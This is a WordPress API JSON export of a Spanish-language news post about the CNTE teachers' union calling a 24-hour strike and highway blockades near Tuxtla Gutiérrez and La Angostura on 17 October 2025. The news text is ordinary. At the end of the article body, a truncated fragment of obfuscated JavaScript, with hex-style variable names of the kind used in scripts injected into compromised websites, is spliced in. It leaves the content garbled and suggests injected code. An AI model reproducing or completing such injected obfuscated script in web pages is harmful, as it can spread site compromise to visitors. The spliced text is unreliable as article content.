{"id":24543,"date":"2025-10-16T02:43:14","date_gmt":"2025-10-16T02:43:14","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=24543"},"modified":"2025-10-16T02:43:15","modified_gmt":"2025-10-16T02:43:15","slug":"confirman-bloqueos-por-la-cnte-el-viernes","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=24543","title":{"rendered":"Confirman bloqueos por la CNTE el viernes"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"259\" height=\"194\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/10\/IMG-20251015-WA0011.jpg\" alt=\"\" class=\"wp-image-24544\"\/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>15 de octubre del 2025. Tuxtla Guti\u00e9rrez.- La Secci\u00f3n 7 de la CNTE convoc\u00f3 a un paro de labores de 24 horas para este viernes 17 de octubre, en exigencia de la instalaci\u00f3n de una Mesa Nacional de di\u00e1logo con la presidenta Claudia Sheinbaum.<\/p>\n\n\n\n<p>En la misma buscan plantear diversas demandas, entre ellas la abrogaci\u00f3n de la Reforma Educativa promulgada durante el gobierno de Enrique Pe\u00f1a Nieto.<\/p>\n\n\n\n<p>Adem\u00e1s del paro magisterial, el sindicato convoc\u00f3 a bloquear dos importantes tramos carreteros en el estado a partir de las nueve de la ma\u00f1ana: uno en la ciudad de Tuxtla Guti\u00e9rrez, espec\u00edficamente en La Pochota, y otro en el desv\u00edo de La Angostura.<\/p>\n\n\n\n<p>Entre los principales puntos de su pliego petitorio, los maestros exigen tambi\u00e9n la instalaci\u00f3n de una Mesa Tripartita conformada por representantes de la CNTE, la presidenta Sheinbaum y el gobernador Eduardo Ram\u00edrez Aguilar, con el objetivo de resolver las diversas problem\u00e1ticas que, aseguran, siguen pendientes desde pasadas administraciones con el magisterio chiapaneco.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 15 de octubre del 2025. Tuxtla Guti\u00e9rrez.- La Secci\u00f3n 7 de la CNTE convoc\u00f3 a un paro de labores de 24 horas para este viernes 17 de octubre, en exigencia de la instalaci\u00f3n de una Mesa Nacional de di\u00e1logo con la presidenta Claudia Sheinbaum. En la misma buscan plantear diversas demandas, entre ellas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":24544,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-24543","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24543","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=24543"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24543\/revisions"}],"predecessor-version":[{"id":24545,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/24543\/revisions\/24545"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/24544"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=24543"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=24543"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=24543"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}